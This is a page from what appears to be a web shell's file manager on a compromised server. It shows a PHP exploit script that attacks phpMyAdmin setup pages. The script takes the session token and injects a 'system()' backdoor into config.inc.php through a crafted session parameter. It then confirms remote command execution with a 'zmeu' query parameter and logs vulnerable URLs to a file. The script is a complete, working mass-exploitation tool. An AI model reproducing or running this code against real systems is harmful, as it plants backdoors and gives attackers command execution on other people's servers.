Your IP : 216.73.217.165

Current Path : /var/www/html/kamini/raz0r/
Upload File :
Current File : //var/www/html/kamini/raz0r/foo

<?php echo php_sapi_name()!=='cli'?'</pre>':'';

if(php_sapi_name()==='cli'){
	if(!isset($argv[1])){
		output("[+]Usage: ".$argv[0]." http://example.com/");
		afara();
	}
	$adresa = $argv[1];	
}else{
	$adresa = isset($_REQUEST['url'])?$_REQUEST['url']:'';
}
$code = 'foreach($_GET as $k=>$v)if($k==="zmeu")system($v);';
$cookie = null;
$token  = null;
if(!function_exists('curl_init')){
	afara();
}
$ch     = curl_init();
$debug  = 0;
if(php_sapi_name()!=='cli'){
?>
<form method=post>
URL: <input name=url value="<?php echo htmlspecialchars($adresa);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>
<input name=submit type=submit value=♥>
</form>
<pre>
<?php
if(!isset($_REQUEST['submit']))afara(true);
}

curl_setopt_array($ch, array(
	CURLOPT_URL => $adresa.'/setup/index.php',
	CURLOPT_HEADER => 1,
	CURLOPT_RETURNTRANSFER => 1,
	CURLOPT_TIMEOUT => 4,
	CURLOPT_SSL_VERIFYPEER => false,
	CURLOPT_SSL_VERIFYHOST => false
));

$result = curl_exec($ch);
if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){
	afara();
}
if(!$result){
	afara();
}
if(false !== strpos($result, 'Cannot load or save configuration')){
	afara();
}

preg_match('/phpMyAdmin=([^;]+)/', $result, $matches);
$cookie = $matches[1];
preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);
$token = $matches[2];
curl_setopt($ch, CURLOPT_URL, $adresa.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);
curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);
if(!$result = curl_exec($ch)){
	afara();
}
curl_setopt($ch, CURLOPT_URL, $adresa.'/setup/config.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);
if(!$result = curl_exec($ch)){
	afara();
}

curl_setopt($ch, CURLOPT_URL, $adresa.'/config/config.inc.php?zmeu=echo%20zzmmeeuu');
curl_setopt($ch, CURLOPT_POST, 0);
if(!$result = curl_exec($ch)){
	afara();
}
if(preg_match('/zzmmeeuu/', $result)){
echo($adresa);
echo("/config/config.inc.php?zmeu=id");
echo("\n");
$fp = fopen('zmeu.txt', 'a+');
fwrite($fp, $adresa);
fwrite($fp, '/config/config.inc.php?zmeu=id');
fwrite($fp, "\n");
fclose($fp);
}else{
//
}


curl_close($ch);

function output($msg){
	echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n";
	flush();
}

function afara(){
	echo php_sapi_name()!=='cli'?'<pre>':'';
	die();
}

echo php_sapi_name()!=='cli'?'<pre>':'';?>